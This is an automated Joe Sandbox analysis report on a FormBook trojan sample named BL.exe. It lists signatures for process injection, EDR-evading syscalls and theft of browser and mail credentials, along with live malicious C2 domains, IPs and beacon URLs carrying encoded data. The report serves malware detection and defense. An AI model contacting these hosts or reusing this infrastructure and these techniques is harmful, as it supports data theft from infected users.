            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538723 Sample: BL.exe Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 28 www.sailforever.xyz 2->28 30 www.launchdreamidea.xyz 2->30 32 19 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 BL.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 68 Contains functionality to detect sleep reduction / modifications 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 OmmtmfniIsg.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 schtasks.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 OmmtmfniIsg.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.sailforever.xyz 103.106.67.112, 49995, 49998, 49999 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 22->34 36 www.givingaway123.net 103.224.182.242, 57337, 57338, 57339 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            BL.exe21%ReversingLabsWin32.Trojan.Autoitinject
            BL.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            booosted.xyz
            		3.33.130.190
            		truetrue
              		unknown
              www.launchdreamidea.xyz
              		188.114.96.3
              		truetrue
                		unknown
                www.drevohome.shop
                		94.23.162.163
                		truetrue
                  		unknown
                  longg002.cn
                  		8.210.49.139
                  		truetrue
                    		unknown
                    www.rudemyvague.info
                    		52.13.151.179
                    		truetrue
                      		unknown
                      www.itemsort.shop
                      		188.114.96.3
                      		truetrue
                        		unknown
                        030002837.xyz
                        		65.21.196.90
                        		truetrue
                          		unknown
                          www.productanalytics.pro
                          		94.23.162.163
                          		truetrue
                            		unknown
                            mondayigboleague.info
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.givingaway123.net
                              		103.224.182.242
                              		truetrue
                                		unknown
                                ethetf.digital
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  www.sailforever.xyz
                                  		103.106.67.112
                                  		truetrue
                                    		unknown
                                    www.jagdud.store
                                    		209.74.64.187
                                    		truetrue
                                      		unknown
                                      www.030002837.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.booosted.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.djazdgc.tokyo
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.stocksm.fun
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.mondayigboleague.info
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.gws-treinamento2.shop
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.kmjai8jf.icu
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.ethetf.digital
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.launchdreamidea.xyz/bd77/true
                                                        		unknown
                                                        http://www.ethetf.digital/m7sk/true
                                                          		unknown
                                                          http://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&DJ=uNx48jdPyvmhqtM0true
                                                            		unknown
                                                            http://www.stocksm.fun/0bvj/true
                                                              		unknown
                                                              http://www.productanalytics.pro/9vwi/true
                                                                		unknown
                                                                http://www.030002837.xyz/y045/true
                                                                  		unknown
                                                                  http://www.030002837.xyz/y045/?qFHlI=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopZ2qqizp83SA4VvMOfKjYwWha+waZ/9hnzA5UcC/NzqTplHtuhYQ=&DJ=uNx48jdPyvmhqtM0true
                                                                    		unknown
                                                                    http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFHzX86cZDIkqxXLJMLfdGhV7qhxXK/cNpqGCzJ34=true
                                                                      		unknown
                                                                      http://www.stocksm.fun/0bvj/?DJ=uNx48jdPyvmhqtM0&qFHlI=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYh+a9+td3GPcpjeWl06kCA+p4W4MdKq1Fwo+I6zMR0Ax5A/L5wR0=true
                                                                        		unknown
                                                                        http://www.jagdud.store/qxse/true
                                                                          		unknown
                                                                          http://www.rudemyvague.info/t7t4/true
                                                                            		unknown
                                                                            http://www.djazdgc.tokyo/0628/?qFHlI=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+FigCVrQtCrgnSlgUA2JT078+MxZtZD+kFHsD8UJb6CndygVk2Aw=&DJ=uNx48jdPyvmhqtM0true
                                                                              		unknown
                                                                              http://www.drevohome.shop/v2k8/true
                                                                                		unknown
                                                                                http://www.rudemyvague.info/t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0true
                                                                                  		unknown
                                                                                  http://www.mondayigboleague.info/t10u/true
                                                                                    		unknown
                                                                                    http://www.itemsort.shop/qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0true
                                                                                      		unknown
                                                                                      http://www.booosted.xyz/12c7/true
                                                                                        		unknown
                                                                                        http://www.sailforever.xyz/hshp/true
                                                                                          		unknown
                                                                                          http://www.launchdreamidea.xyz/bd77/?DJ=uNx48jdPyvmhqtM0&qFHlI=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHC3UpiwTnXxeZhDJSRDe+gKqbpDrlYtFKzXKQkj7Y9H+PYGWNXRqA=true
                                                                                            		unknown
                                                                                            http://www.mondayigboleague.info/t10u/?qFHlI=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDvDpYIFnALopyeCE4e57jCdKl+SQ4LvrwwLBMyOkaQtLwrEg4wvg=&DJ=uNx48jdPyvmhqtM0true
                                                                                              		unknown
                                                                                              http://www.givingaway123.net/1juc/true
                                                                                                		unknown
                                                                                                http://www.jagdud.store/qxse/?qFHlI=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85K9GP26O7G/CGnyNUhwPTmghA/Wmfri1zUJzRsgXk3AqKswS13LU=&DJ=uNx48jdPyvmhqtM0true
                                                                                                  		unknown
                                                                                                  http://www.productanalytics.pro/9vwi/?qFHlI=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32clZoBW+L2SPWINxOvyiUavjXvOCviB5/F051x4xiH/bw0UeFq30=&DJ=uNx48jdPyvmhqtM0true
                                                                                                    		unknown
                                                                                                    http://www.drevohome.shop/v2k8/?qFHlI=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM/qngBj8ZZb4M/OowV3zWfgcOAFUEQlNa1pKq422xJxUSmdUbTzU=&DJ=uNx48jdPyvmhqtM0true
                                                                                                      		unknown
                                                                                                      http://www.booosted.xyz/12c7/?qFHlI=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqLWVeQHwe4Xrlx3fbLdvyLDYZde2riYRc/AFjVf5IhMWO0SHTC3s=&DJ=uNx48jdPyvmhqtM0true
                                                                                                        		unknown
                                                                                                        http://www.djazdgc.tokyo/0628/true
                                                                                                          		unknown
                                                                                                          http://www.ethetf.digital/m7sk/?qFHlI=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC8xJPP/rIa82Zn+KkAGuf+vJpb06LBCpCcPbQ0IYrj4c+7eLludaI=&DJ=uNx48jdPyvmhqtM0true
                                                                                                            		unknown

                                                                                                            URLs from Memory and Binaries

                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                            https://duckduckgo.com/chrome_newtabschtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://duckduckgo.com/ac/?q=schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://www.icann.org/resources/pages/non-response-2014-01-29-enOmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000040B0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://emailverification.info/OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000040B0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.gandi.net/en/domainschtasks.exe, 00000004.00000002.4648172740.0000000004040000.00000004.10000000.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003420000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.ecosia.org/newtab/schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003744000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://ac.ecosia.org/autocomplete?q=schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.productanalytics.proOmmtmfniIsg.exe, 00000006.00000002.4649388492.0000000004B63000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckPOmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000002F6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchschtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://whois.gandi.net/en/results?search=stocksm.funschtasks.exe, 00000004.00000002.4648172740.0000000004040000.00000004.10000000.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003420000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          8.210.49.139
                                                                                                                          		longg002.cnSingapore
                                                                                                                          		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                          103.106.67.112
                                                                                                                          		www.sailforever.xyzNew Zealand
                                                                                                                          		56030VOYAGERNET-AS-APVoyagerInternetLtdNZtrue
                                                                                                                          209.74.64.187
                                                                                                                          		www.jagdud.storeUnited States
                                                                                                                          		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                          65.21.196.90
                                                                                                                          		030002837.xyzUnited States
                                                                                                                          		199592CP-ASDEtrue
                                                                                                                          94.23.162.163
                                                                                                                          		www.drevohome.shopFrance
                                                                                                                          		16276OVHFRtrue
                                                                                                                          188.114.96.3
                                                                                                                          		www.launchdreamidea.xyzEuropean Union
                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                          103.224.182.242
                                                                                                                          		www.givingaway123.netAustralia
                                                                                                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                          217.70.184.50
                                                                                                                          		unknownFrance
                                                                                                                          		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                                                                                          52.13.151.179
                                                                                                                          		www.rudemyvague.infoUnited States
                                                                                                                          		16509AMAZON-02UStrue
                                                                                                                          3.33.130.190
                                                                                                                          		booosted.xyzUnited States
                                                                                                                          		8987AMAZONEXPANSIONGBtrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1538723
                                                                                                                          Start date and time:2024-10-21 17:23:13 +02:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 10m 57s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:2
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Sample name:BL.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@17/10
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 75%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 97%
                                                                                                                          • Number of executed functions: 38
                                                                                                                          • Number of non-executed functions: 316
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.190.159.68, 20.190.159.23, 20.190.159.2, 20.190.159.64, 20.190.159.4, 20.190.159.71, 20.190.159.0, 40.126.31.73
                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                          • Execution Graph export aborted for target OmmtmfniIsg.exe, PID 5196 because it is empty
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • VT rate limit hit for: BL.exe

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          11:25:07API Interceptor12636287x Sleep call for process: schtasks.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          103.106.67.112BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.sailforever.xyz/hshp/
                                                                                                                          209.74.64.187rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.turnnex.online/dhzn/
                                                                                                                          ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.goldpal.xyz/ym9o/
                                                                                                                          BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.jagdud.store/qxse/
                                                                                                                          PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.cotxot.info/fqdb/
                                                                                                                          FDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.selectox.xyz/b26r/
                                                                                                                          65.21.196.90rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002832.xyz/k59q/
                                                                                                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002787.xyz/jd21/?4h=5kdLJS6M41di2+SNW7K1XcXipX6NQkkN8kSgJbF3gr0dFVoGwgZsF4aW2rsxuxwIowbH&pPQ=OJEtxf4
                                                                                                                          jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002803.xyz/bw0u/
                                                                                                                          quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002832.xyz/k59q/
                                                                                                                          AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002252.xyz/2ncs/
                                                                                                                          NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002304.xyz/6uay/
                                                                                                                          8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002304.xyz/f06i/
                                                                                                                          BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002837.xyz/y045/
                                                                                                                          BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.070001294.xyz/90jl/
                                                                                                                          5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.030002721.xyz/st0f/?-hF=sZ0LOH4&HPBxr6=OZJ3FWHE8eHsfWE6sR/jZh7GV9NsFGiNmpPQ4eftWQT1hyascoenGoAxdn6KH9WZ2QPSeMYxIK2pDBtCkY1R4v4J1R7l9kCKhVgR/LucEqSnpRqwhg==
                                                                                                                          94.23.162.163sBX8VM67ZE.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.kinkynerdspro.blog/niik/
                                                                                                                          c3la9wUkHe.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.youreducation.academy/skhi/
                                                                                                                          DOC 0201_360737031.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.youreducation.academy/skhi/
                                                                                                                          Remittance advice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • www.youreducation.academy/skhi/
                                                                                                                          product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                                                                                                                          • www.kinkynerdspro.blog/ufuh/
                                                                                                                          New Order.docGet hashmaliciousFormBookBrowse
                                                                                                                          • www.kinkynerdspro.blog/ufuh/
                                                                                                                          GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.kinkynerdspro.blog/ufuh/
                                                                                                                          GcwoApxt8q.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.kinkynerdspro.blog/ufuh/
                                                                                                                          opszx.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.kinkynerdspro.blog/ufuh/
                                                                                                                          MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                                                                          • www.kinkynerdspro.blog/ufuh/

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          www.rudemyvague.infoBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 52.13.151.179
                                                                                                                          www.productanalytics.proPending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 54.38.220.85
                                                                                                                          www.launchdreamidea.xyzPO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          www.drevohome.shopBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 54.38.220.85
                                                                                                                          www.itemsort.shopBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          longg002.cnBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 8.210.49.139

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          CP-ASDErDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          https://eadzhost.net/quieter/QUOTE_TECNO_GAZ_INDUSTRIES_63787_MC.rarGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.29.43
                                                                                                                          na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          MULTIBAND-NEWHOPEUSRequest for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 209.74.64.189
                                                                                                                          Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.187
                                                                                                                          r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          Tandemmernes90.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 209.74.64.189
                                                                                                                          PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.95.29
                                                                                                                          Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                                                                                                          • 209.74.66.146
                                                                                                                          CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCindex.htmlGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.254.175.252
                                                                                                                          index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.254.175.252
                                                                                                                          PDWsetup.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 8.217.62.104
                                                                                                                          request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                          • 8.223.114.243
                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.241.41.42
                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.241.41.42
                                                                                                                          yakuza.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.57.30.200
                                                                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.245.134.47
                                                                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 8.213.113.50
                                                                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 8.215.31.201
                                                                                                                          VOYAGERNET-AS-APVoyagerInternetLtdNZarm.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                          • 114.23.169.157
                                                                                                                          BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 103.106.67.112
                                                                                                                          Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 103.106.67.112
                                                                                                                          0wG3Y7nLHa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                          • 111.65.234.232
                                                                                                                          i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 202.154.140.243
                                                                                                                          xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 203.96.31.242
                                                                                                                          KKveTTgaAAsecNNaaaa.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 103.146.201.21
                                                                                                                          kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                                                                                                          • 203.96.177.211
                                                                                                                          https://app.realcreator.co/preview/9fe9f3e5-8e52-4155-934b-225a56159ee0Get hashmaliciousUnknownBrowse
                                                                                                                          • 103.146.241.97
                                                                                                                          arm5-20240709-0417.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 114.23.243.29

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Temp\6222f67M

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196608
                                                                                                                          Entropy (8bit):1.1239949490932863
                                                                                                                          Encrypted:false
